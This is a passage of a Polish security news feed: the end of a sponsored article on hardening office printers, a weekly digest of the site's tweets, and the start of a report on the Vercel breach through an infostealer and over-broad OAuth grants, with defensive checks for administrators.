<li class="li4">„PIN jest wspólny”,</li>
<li class="li4">logi są „jakieś” albo żadne,</li>
</ul>
<p class="p1">to masz idealne warunki, żeby w razie incydentu ktoś powiedział: <i>„to nie ja”</i> &#8211; i na tym kończy się badanie ścieżek wroga.</p>
<p class="p1">Zrób więc to, co robisz w innych systemach:</p>
<ul class="ul1">
<li class="li4">włącz uwierzytelnianie (karta/PIN/SSO),</li>
<li class="li4">rozdziel role (użytkownik vs admin vs użytkownik vs serwis),</li>
<li class="li4">ogranicz funkcje zależnie od roli,</li>
<li class="li4">loguj i audytuj.</li>
</ul>
<p class="p4">&#8211; Największa różnica ‘po hardeningu’ to moment, w którym operacje na MFP przestają być anonimowe. Jeśli drukujesz, kopiujesz, skanujesz &#8211; to jest to przypięte do tożsamości – dodaje Daniel Mazur, Inforoffice Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po czwarte: Zamknij zbędne bramy. Mniej protokołów = mniej problemów</p>
</blockquote>
<p class="p1">Teraz robisz ulubioną część adminów: <strong>redukcję powierzchni ataku</strong>. Wyobraź sobie MFP jako zamek. Jeśli masz 12 bram, to cyberninja nie musi być geniuszem &#8211; wystarczy, że jedna jest uchylona.</p>
<p class="p1">Twoje zadanie:</p>
<ul class="ul1">
<li class="li4">wyłącz protokoły, których nie używasz (serio, <i>nie używasz</i>),</li>
<li class="li4">zostaw tylko te, które są potrzebne do realnych procesów,</li>
<li class="li5">zabezpiecz panel administratora: tylko HTTPS i dostęp wyłącznie z określonych adresów/VLANów.</li>
<li class="li5">kontroluj pozostałą komunikację: skonfiguruj ACL/filtry IP i segmentację.</li>
</ul>
<p>To jest dokładnie ta część, w której drukarka przestaje być „łatwym celem”.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po piąte: “Szyfruj albo giń” + FIPS 140-3</p>
</blockquote>
<p class="p1">Tu wchodzimy na poziom, gdzie nie da się już powiedzieć: „to tylko drukarka”. MFP przetwarza dane. Czasem bardzo wrażliwe.</p>
<p>To oznacza, że:</p>
<ul class="ul1">
<li class="li2"><b>dane w spoczynku</b> (na dysku),</li>
<li class="li2"><b>dane w tranzycie</b> (po sieci),</li>
<li class="li4"><b>tożsamość i rozliczalność</b> (kto, co, kiedy zrobił)</li>
</ul>
<p class="p4">…muszą być chronione jak w każdej innej części IT.</p>
<p class="p1">FIPS 140-3 jest standardem certyfikacji modułów kryptograficznych. Nie chodzi o to, żebyś teraz recytował listę algorytmów. Chodzi o to, żeby kryptografia w urządzeniu była <strong>sprawdzalna, aktualna i sensownie wdrożona</strong>.</p>
<p class="p1">W praktyce:</p>
<ul class="ul1">
<li class="li2">szyfrujesz dane na dysku (żeby kradzież urządzenia nie była kradzieżą danych),</li>
<li class="li2">wymuszasz TLS/HTTPS (żeby wydruki i skany nie latały “plaintextem”),</li>
<li class="li2">spinasz urządzenie z katalogiem/SSO (żeby operacje były przypisane do użytkownika).</li>
</ul>
<p class="p1"><b><br />
</b>&#8211; <em>Kryptografia i tożsamość to dwa filary. Jeśli drukujesz bez autoryzacji i bez szyfrowania, to nawet najlepszy firewall nie uratuje cię przed własną infrastrukturą </em>– dodaje Dariusz Szwed, Canon Polska.</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po szóste:<b>Posprzątaj po sobie. Bufory i historie to też dane</b></p>
</blockquote>
<p class="p1">NIST 800-88 mówi o sanitizacji danych. Brzmi prawie tak samo jakbym mówił do Ciebie po japońsku?</p>
<p>W odniesieniu do MFP oznacza to: <strong>nie zostawiaj śladów, które ktoś może później wykorzystać przeciw Tobie</strong>.</p>
<p class="p1">Sprawdź/włącz:</p>
<ul class="ul1">
<li class="li4">automatyczne czyszczenie danych zadań i buforów,</li>
<li class="li4">nadpisywanie danych tam, gdzie jest wspierane,</li>
<li class="li4">sensowną retencję logów (żeby pomagały, a nie szkodziły).</li>
</ul>
<p class="p5">To jeden z tych rytuałów, których znaczenia często się nie docenia, dopóki nie nadejdzie czas próby, a audyt lub incydent nie odsłoni prawdy…</p>
<blockquote><p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f536.png" alt="🔶" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Po siódme: Pokaż mi porty, a powiem ci, czy Twoja twierdza przetrwa oblężenie</p>
</blockquote>
<p class="p4">Przed hardeningiem często zobaczysz:</p>
<ul class="ul1">
<li class="li4">dużo otwartych portów,</li>
<li class="li4">kilka aktywnych usług „bo tak”,</li>
<li class="li4">admina dostępnego z sieci użytkowników,</li>
<li class="li4">brak twardego wymuszenia szyfrowania.</li>
</ul>
<p class="p1">Po wdrożeniu polityk w duchu NIST i FIPS:</p>
<ul class="ul1">
<li class="li4">portów robi się wyraźnie mniej (czasem drastycznie),</li>
<li class="li4">zostają tylko potrzebne usługi,</li>
<li class="li4">admin jest w kontrolowanej strefie,</li>
<li class="li4">komunikacja jest szyfrowana,</li>
<li class="li4">stare protokoły znikają.</li>
</ul>
<p class="p1">To nie jest kosmetyka. To jest realna zmiana profilu obrony: ograniczona powierzchnia ataku, większa szansa na przetrwanie, gdy nocą do bram podejdzie wróg.</p>
<p><a name="flota" href=""></a></p>
<h3>Security Settings Navigator oczywiście nie jest lekarstwem na wszystko.<br />
Masz flotę? Potrzebujesz zarządzania.</h3>
<p class="p1">Jeśli masz jedną drukarkę, możesz przemierzać drogę bezpieczeństwa jako <strong>wojownik samotnik</strong>, który zna każdy port, każdą usługę, każdy ruch maszyny. Jeśli masz ich 80… to już nie jest nawet dojo, tylko pełnowymiarowe pole bitwy, włączające konieczność strategicznego planowania.</p>
<p class="p1">Security Settings Navigator ma sens szczególnie dla małych środowisk lub pojedynczych urządzeń.</p>
<p>Przy dużej skali nie chodzi już tylko o ochronę. Chodzi o dyscyplinę &#8211; o to, by każde urządzenie, w każdej lokalizacji, działało zgodnie z jedną ścieżką, jednym kodeksem.</p>
<p class="p1">Do tego potrzeba już narzędzi zdolnych do:</p>
<ul class="ul1">
<li class="li1">masowych zmian konfiguracji,</li>
<li class="li1">weryfikacji zgodności,</li>
<li class="li1">aktualizacji,</li>
<li class="li1">raportów pod audyt</li>
</ul>
<p class="p6">I ten wątek otwiera kolejną sagę o Samuraju, który strzeże firmowych danych.</p>
<p class="p1"><strong>Hardening jest rytuałem wejścia, a utrzymanie zgodności &#8211; dowodem, że wojownik pozostaje wierny swojemu przeznaczeniu.</strong></p>
<div class="info">Autorem niniejszego artykułu jest <strong>Canon Polska</strong>, producent i dostawca rozwiązań do druku i obiegu dokumentów, w których bezpieczeństwo jest <a href="https://www.canon.pl/press-centre/press-releases/2026/04/canon-recognised-as-a-leader-in-the-worldwide-print-security-solutions-and-services-hardcopy/" target="_blank">elementem architektury</a>, a nie dodatkiem. Artykuł jest artykułem sponsorowanym i za jego publikację otrzymaliśmy wynagrodzenie.Rozwiązania do druku od <strong>Canon Polska</strong> stawiają na bezpieczeństwo, co widać zarówno w zaawansowanych urządzeniach wielofunkcyjnych z <a href="https://www.canon.pl/business/products/office-printers/multifunction/imageforce/" target="_blank">serii imageFORCE</a>, tworzonych z myślą o środowiskach o podwyższonych wymaganiach bezpieczeństwa, jak i laserowych drukarkach Canon <a href="https://www.canon.pl/printers/laser-printers/" target="_blank">iSENSYS</a>, które już w podstawowej konfiguracji oferują szyfrowanie danych, silne mechanizmy uwierzytelniania i nowoczesne standardy sieciowe.</p>
<p>Partnerem merytorycznym artykułu jest także <a href="https://inforoffice.pl/bezpieczenstwo-druku/" target="_blank">Inforoffice Polska</a><br />
Akredytowany Partner Canon Polska. Integrator rozwiązań z zakresu druku, kopiowania, skanowania i cyfrowego obiegu dokumentów. Specjalizuje się we wdrażaniu bezpiecznych środowisk pracy z dokumentami, łącząc urządzenia Canon z systemami zarządzania dokumentami, kontroli dostępu i politykami bezpieczeństwa organizacji.</p>
</div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/#comments" rel="replies" thr:count="10" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/dlaczego-drukarki-w-stanie-fabrycznym-to-stan-zagrozenia-a-nie-gotowosci/feed/atom/" rel="replies" thr:count="10" type="application/atom+xml"/>
			<thr:total>10</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[O czym pisaliśmy w zeszłym tygodniu, ale &#x274c; NIE na Niebezpieczniku?]]></title>
		<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27044</id>
		<updated>2026-04-27T10:17:50Z</updated>
		<published>2026-04-27T10:15:21Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Niebezpiecznik"/><category scheme="https://niebezpiecznik.pl" term="Twitter"/><category scheme="https://niebezpiecznik.pl" term="X"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/niebezpiecznik-logo-black-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>W jednym z ostatnich artykułów przypomnieliśmy, że nasza redakcja jest najbardziej aktywna na Twitterze. Część z Was zwróciła uwagę, że na Twittera nie zagląda i zasugerowała, aby publikować tu, na Niebezpieczniku, jakiś &#8220;skrót&#8221; tego o czym twitujemy. No więc oto pierwszy z takich skrótów, podsumowujący zeszły tydzień naszej aktywności na Twitterze (~40 wpisów, ~5 dziennie). Zanim [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/"><![CDATA[<p>W jednym z ostatnich artykułów przypomnieliśmy, że nasza redakcja jest najbardziej aktywna na Twitterze. Część z Was zwróciła uwagę, że na Twittera nie zagląda i zasugerowała, aby publikować tu, na Niebezpieczniku, jakiś &#8220;skrót&#8221; tego o czym twitujemy. No więc oto pierwszy z takich skrótów, podsumowujący zeszły tydzień naszej aktywności na Twitterze (~40 wpisów, ~5 dziennie). </p>
<p>Zanim jednak do niego przejdziemy &#8212; słowo wyjaśnienia, dlaczego na Twitterze pojawiają się treści, których nie widać na Niebezpiecznik.pl. <span id="more-27044"></span></p>
<h3>Dlaczego Twitter?</h3>
<p>Od zawsze staramy się, aby na Niebezpiecznika trafiały dłuższe, przemyślane i mocno merytoryczne publikacje. Bo Niebezpiecznik to serwis internetowy, a nie platforma społecznościowa. Nie każdy wpis z Twittera da się rozwinąć do tego typu formy &#8212; a <strong>na siłę nie ma sensu tego robić</strong>. Coś co może być jednym zdaniem, lepiej żeby pozostało jednym zdaniem, a nie przepełnionym miałką treścią artykułem na 15 akapitów. To pierwszy, najważniejszy powód. Drugim powodem jest to, że na Twitterze często podajemy lub &#8220;retwitujemy&#8221; dalej cudze treści bez jakiegokolwiek opisu. To zdecydowanie szybsze i mniej pracochłonne niż pełnoprawna publikacja na Niebezpieczniku.  </p>
<p>I żeby było jasne &#8212; <strong>Twitter nie jest idealną platformą</strong> (wręcz jest bardzo nieidealną), ale ze uważamy, że jeśli chodzi o obszar IT Security, to ze wszystkich social mediów jest platformą najlepszą, jeśli chodzi o ilość i jakość wiedzy oraz <strong>prędkość</strong> jej pozyskiwania (jeśli się wie, kogo śledzić). Dlatego tych z Was, którzy zajmują się cyberbezpieczeństwem zawodowo, zachęcamy do <a href="https://x.com/niebezpiecznik">obserwowania naszego profilu</a> &#8212; abyście trzymali rękę na pulsie, bo to w naszej branży jest szalenie istotne. Np. opisywany przez nas tydzień temu na Twitterze <a href="https://x.com/niebezpiecznik/status/2046490369584402936" target="_blank">hack Polymarketu suszarką</a> niektóre serwisy opisuję dopiero dziś, po tygodniu&#8230; </p>
<p>Reszcie naszych Czytelników, mamy nadzieję, że wystarczą takie podsumowania jak to.</p>
<ol>
<li><a href="https://x.com/niebezpiecznik/status/2045941650048929886?s=20">Film pokazujący narzędzie &#8220;Maven&#8221; od Palantira w akcji</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046161621970546968">Ostrzeżenie o awarii Polcardu</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046285079228362756">Ciekawy wątek o antenach szpiegowskich na dachu rosyjskiej ambasady w Wiedniu</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046303797321093470">Wątek o &#8220;wycieku danych&#8221; z seriwsu do vibecodingu: Lovable</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046463456807669905">Video laptopa z 1989 &#8212; uwaga, uronicie łzę</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046490369584402936">Historia o tym jak ktoś wygrał kupę kasy w zakładzie na Polymarket &#8230;suszarką, którą sztucznie podbił temperature w okolicach czujnika na lotnisku.</a> </li>
<li><a href="https://x.com/niebezpiecznik/status/2046589465477394527" target="_blank">O chaosie w Zondzie</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046602622157590715" target="_blank">O tym że wszędzie większość treści to już prawie treści generowane przez AI</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046646650014175608" target="_blank">O tym jak kopanie prądem porfeli bitocoinowych pomaga wykraść z nich środki</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2046662100064375125" target="_blank">Porady co do bezpiecznego sposobu na kasowanie kont z serwisów internetowych.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2046826117726618106" target="_blank">O tym jak typy z Discorda uzyskały dostęp do Mythosa od Anthropica na lewo</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047013570357944573">Komunikat dla użytkowników Jiry i Confluence o tym, że mają czas do 27 sierpnia aby wypisać się z użycia ich danych do szkolenia modeli AI</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2047195743434277069" target="_blank">Opis ciekawego sposobu na wyciek danych z iPhona i poprawki bezpieczeństwa do iOS</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047195767308222708" target="_blank">Demo narzędzia do spoofingu GPS</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047217628419162250" target="_blank">O ataku na niemieckich polityków przez Signala.</a></li>
<li>A tego posta to zacytujemy w całości bo śmieszny:<br />
<blockquote class="twitter-tweet">
<p lang="pl" dir="ltr">Kamil napisał: &quot;W naszej firmie właśnie ruszyła <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/274c.png" alt="❌" class="wp-smiley" style="height: 1em; max-height: 1em;" /> fala zwolnień ze względu na AI. Okazało się, że kosz tokenów modeli AI zrobił się tak duży, że anulowaliśmy 5 subskrypcji narzędzi AI i zatrudniliśmy 2 senior programistów&quot;</p>
<p>&mdash; Niebezpiecznik (@niebezpiecznik) <a href="https://twitter.com/niebezpiecznik/status/2047230252091322588?ref_src=twsrc%5Etfw">April 23, 2026</a></p></blockquote>
<p> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></li>
<li><a href="https://x.com/niebezpiecznik/status/2047245653860860401" target="_blank">O ataku na skaner kodu Checkmarx i ryzykach z tym związanych dla jego użytkowników</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047253747810586786" target="_blank">Apel aby uważać na wyszukiwarkę tanich lotów Kiwi</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047224526971306275" target="_blank">Komentarz do smutnej historii przedsiębiorcy, który chciałby korzystać z systemów rządowych na 16 letnim komputerze.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047316097255268621" target="_blank">Opis zhackowania Bitwardena CLI</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047378473912586642" target="_blank">O tym że Chińczycy destylują Amerykanów</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047566693132624016" target="_blank">O taśmach Suszek &#8211; Zaorski i długach liczonych w milionach</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047574190824276364" target="_blank">Test autotłumaczenia</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047589150094762141" target="_blank">O kolejnej osobie, która ograła Polymarket: żołnierzu USA co zarobił 1,5 miliona złotych.</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047594393322840328" target="_blank">Memik na temat wykorzystania tokenów AI w firmach</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047654548060147863" target="_blank">O upadających programach Bug Bounty</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047931615058305101" target="_blank">O chińskim detektorze StarLinków</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2047960575779516636" target="_blank">Komentarz do fakenewsa na temat sprzedaży danych klientów Zondy</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048008936800887105" target="_blank">Informacja o inwestycji Google w Anthropic: 40 miliardów dolarów</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048027295026127111" target="_blank">O nowych ustawieniach treści w Twitterze</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048102767802159368" target="_blank">O hacku Ukraińców spotkania rekrutacyjnego, na którym zachęcano studentów do wstąpienia do armii</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048104255865639309" target="_blank">O dużej akcji rozmontowania azjatyckiego scam center które robiło wały &#8220;na romanse&#8221;, &#8220;na pracownika banku&#8221; it</a>p.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048365051040415805" target="_blank">O tym, że ograniczenie wieku w Australii w dostępie do social mediów nie zadziałało</a>.</li>
<li><a href="https://x.com/niebezpiecznik/status/2048409777055609281" target="_blank">O teściach w osobnym VLAN-ie</a></li>
<li><a href="https://x.com/niebezpiecznik/status/2048454814070079995" target="_blank">O wzrastającej fali ataków fizycznych na kryptowalutowych Francuzów</a> </li>
<li><a href="https://x.com/niebezpiecznik/status/2048461923419648139" target="_blank">O tym, że najsławniejsza zbiórka w polskim internecie (łatwogang) rozłożyła serwery siepomaga</a></li>
</ol>
<p>&nbsp;</p>
<p>Dajcie znać, czy takie podsumowania jak to mają dla Was wartość? Czy mamy je kontynuować? A może wyobrażacie sobie je inaczej? Jeśli tak &#8212; co dodać, co zmienic? </p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/#comments" rel="replies" thr:count="4" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/o-czym-pisalismy-w-zeszlym-tygodniu-ale-nie-na-niebezpieczniku/feed/atom/" rel="replies" thr:count="4" type="application/atom+xml"/>
			<thr:total>4</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Zhackowali ich, bo pracownik SaaS z którego korzystali pobrał cheaty do gier. Czyli dlaczego trzeba uważać na OAuth!]]></title>
		<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27020</id>
		<updated>2026-04-21T11:40:24Z</updated>
		<published>2026-04-21T11:40:24Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="Contex.ai"/><category scheme="https://niebezpiecznik.pl" term="eskalacja przywilejów"/><category scheme="https://niebezpiecznik.pl" term="Google Workspace"/><category scheme="https://niebezpiecznik.pl" term="infostealer"/><category scheme="https://niebezpiecznik.pl" term="malware"/><category scheme="https://niebezpiecznik.pl" term="SaaS"/><category scheme="https://niebezpiecznik.pl" term="stealer"/><category scheme="https://niebezpiecznik.pl" term="Vercel"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-150x150.png" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych &#8220;technicznych&#8221; firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/"><![CDATA[<p>Jaka piękna katastrofa! W tej historii jest wszystko: infekcja nie jednego, a dwóch niezbyt roztropnych pracowników różnych &#8220;technicznych&#8221; firm. Przeskok z jednej zainfekowanej infrastrukry na drugą, bo żadna z firm nie korzystała z zasady minimalnych przywilejów a można odnieść wrażenie, że w ogóle z żadnych mechanizmów bezpieczeństwa. I wreszcie grupa atakujących, która kradnie tożsamość innej grupie oraz plujący jadem internetowi przeciwnicy vibecodingu, którzy z widłami poszli na firmę, bo przecież wiadomo, że &#8220;każdy programista AI to debil&#8221;. A okazało się, że AI nie miało z tym atakiem niczego wspólnego.<span id="more-27020"></span></p>
<h3>Od czego się zaczęło?</h3>
<p>19 kwietnia na znanym hackerskim forum pojawiła się informacja o tym, że popularna wśród vibecoderów platforma Vercel została zhackowana. Atakujący podpisujący się jako ShinyHunters wystawili na sprzedaż klucze i dostępy do bazy danych firmy. Zrobiło się gorąco w środowisku, bo Vercel stoi też za narzędziem v0 oraz popularną biblioteką Next.js, a to od razu przywołało <a href="https://niebezpiecznik.pl/tag/supply-chain/" target="_blank">ostatnie głośne ataki supply chain</a>.</p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked.jpeg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-600x489.jpeg" alt="" width="600" height="489" class="aligncenter size-large wp-image-27021" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-600x489.jpeg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked-307x250.jpeg 307w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/vercel-hacked.jpeg 739w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Na początku oczywiście spekulowano, że przełamanie zabezpieczeń to wynik użycia beztroskiego vibecodingu do budowy i konfiguracji mechanizmów bezpieczeństwa Vercela. Bo firma z vibecodingiem jest kojarzona. Ale prawda okazała jeszcze bardziej bolesna. Źródłem ataku był łańcuch dwóch pracowników. </p>
<ul>
<li>Pierwszy to pracownik zewnętrznej firmy &#8212; Contex.ai, który pobierał &#8230;cheaty do gry Roblox zainfekowane infostealerem Lumma. Dzięki temu atakujący mieli dostęp do infrastruktury firmy Contex.ai oraz danych jej klientów. Dwa miesiące temu 17 lutego. Poniżej widok tego, co infostealer wystawiał z jego hosta:
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel.png"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-350x241.png" alt="" width="350" height="241" class="aligncenter size-medium wp-image-27022" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-350x241.png 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-600x412.png 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel-768x528.png 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel.png 1123w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-231x250.jpg" alt="" width="231" height="250" class="aligncenter size-medium wp-image-27024" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-231x250.jpg 231w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-554x600.jpg 554w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-768x831.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2-1420x1536.jpg 1420w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/contex.ai-vercel2.jpg 1438w" sizes="auto, (max-width: 231px) 100vw, 231px" /></a>
</li>
<li>Drugi to pracownik Vercela, który korzystał z narzędzi Contex.ai, ale zalogował się do nich ze swojego służbowego konta Google Workspace, dając im poprzez OAuth pełne uprawnienia (&#8220;allow all&#8221;) do środowiska Vercela.</li>
</ul>
<p>Infekcja pierwszego pracownika dała atakującym dostęp do jego uprawnień w różnych usługach (Supabase, Datadog, Authkit) oraz do skrzynki <span class="code">support@contex.ai</span>, dzięki której udało się im &#8220;zpivotować&#8221; do infrastruktury Vercela. Żadnego przejęcia hasła. Żadnego phishingu. Żadnego exploita. Kurtyna. </p>
<div class="info">
<a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/domino-vercel.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/domino-vercel-600x414.jpg" alt="" width="400" height="414" class="aligncenter size-large wp-image-27023" /></a></p>
<p>Jeśli nie chcesz, by jeden nieostrożny pracownik albo błędnie skonfigurowane środowisko pracy rozłożyło Twoją firmę na łopatki, to zapisz swój zespół na nasze <a href="https://niebezpiecznik.pl/web" target="_blank">szkolenie z bezpieczeństwa dla programistów</a> lub <a href="https://niebezpiecznik.pl/net" target="_blank">administratorów</a>! Pokazujemy na takim szkoleniu w praktyce, jakich błędów uniknąć, żeby nie znaleźć się na czołówkach gazet i nie musieć wysyłać zgłoszeń do RODO oraz listów z frazą &#8220;bezpieczeństwo jest dla nas najważniejsze, ale&#8230;&#8221; do Klientów ;)
</div>
<p>Żeby było weselej, grupa ShinyHunters stwierdziła na swoim kanale na Telegramie, że ktoś się pod nich podszywa (zapewne aby podnieść wiarygodność swojego ogłoszenia) a oni żadnych dostępów do Vercela nie sprzedają. </p>
<h3>Jak sprawdzić, czy nie macie takich pracowników u siebie w firmie?</h3>
<p>Jeśli korzystacie z Google Workspace, sprawdźcie czy też przypadkiem nie macie &#8220;zbyt szerokich dostępów&#8221; wpiętych po OAuth do swojej infrastruktury. W tym celu zaloguj się do panelu Google Admin Console i wejdź w sekcję Security. A potem Access and Data Control -> API Controls -> Manage app access -> <a href="https://admin.google.com/ac/owl/list?tab=apps" target="_blank">Accessed Apps</a>. Tu widać wszystkie aplikacje mające dostęp do Waszego środowiska. Warto sprawdzić, czy nie ma wśród nich dokładnie tej, która &#8220;zhackowała&#8221; Vercela. Aby to zrobić, wystarczy przefiltrować listę po ID aplikacji: </p>
<p><code>"110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent[.]com"</code></p>
<p>Jeśli zobaczysz tę aplikację na liście &#8212; oznacza to, że Twój firmowy Workspace może mieć nieproszonych gości. Należy niezwłocznie usunąć dostępy, rozpocząć procedurę analizy logów audytowych i zrotować adekwatne tokeny i hasła.</p>
<blockquote><p>Może warto też na przyszłość ograniczyć możliwość uwierzytelniania się po OAuth niektórym pracownikom/aplikacjom? Jest więcej niż pewne, że Wasi współpracownicy korzystają z kont służbowych do logowania się w usługach firm trzecich, zostawiając tam tokeny, które mogą dać komuś dostęp do Waszej infrastruktury&#8230; Nie mówiąc już o naruszeniach umów o poufność i wysyłaniu danych osobowych poza EOG. Jeśli zarządzasz IT w jakiejś firmie, warto to (i nie tylko to) ryzyko zaadresować jak najszybciej, a my możemy w tym pomóc. Jeśli nie wiesz od czego zacząć albo jak poprawnie ułożyć cyberbezpieczeństwo w firmie od zera, <a href="mailto:cso@niebezpiecznik.pl" target="_blank">daj nam znać &#8212; pomożemy</a>!</p></blockquote>
<p>A jeśli korzystasz z Vercela, to dobrym pomysłem będzie rotacja wszystkich sekretów, &#8220;sensitive variables&#8221; i rozważenie korzystania z zewnętrznych Secret Managerów na przyszłość. </p>
<h3>Vercel informuje klientów</h3>
<p>W sieci pojawiła się <a href="https://x.com/rauchg/status/2045995362499076169?s=12" target="_blank">wypowiedź</a> CEO Vercela z opisem ich ustaleń. Są też <a href="https://context.ai/security-update" target="_blank">gorzkie słowa</a> ze strony Contex.ai:</p>
<blockquote><p>Vercel is not a Context customer, but it appears that at least one employee enabled “allow all” on all requested Google Workspace permissions using their Vercel Google Workspace account. These permissions were intended to grant AI agents the ability to perform Google Workspace actions such as writing emails or creating documents on the grantee’s behalf.</p></blockquote>
<h3>Nie zwalajcie winy na AI (w tym przypadku)</h3>
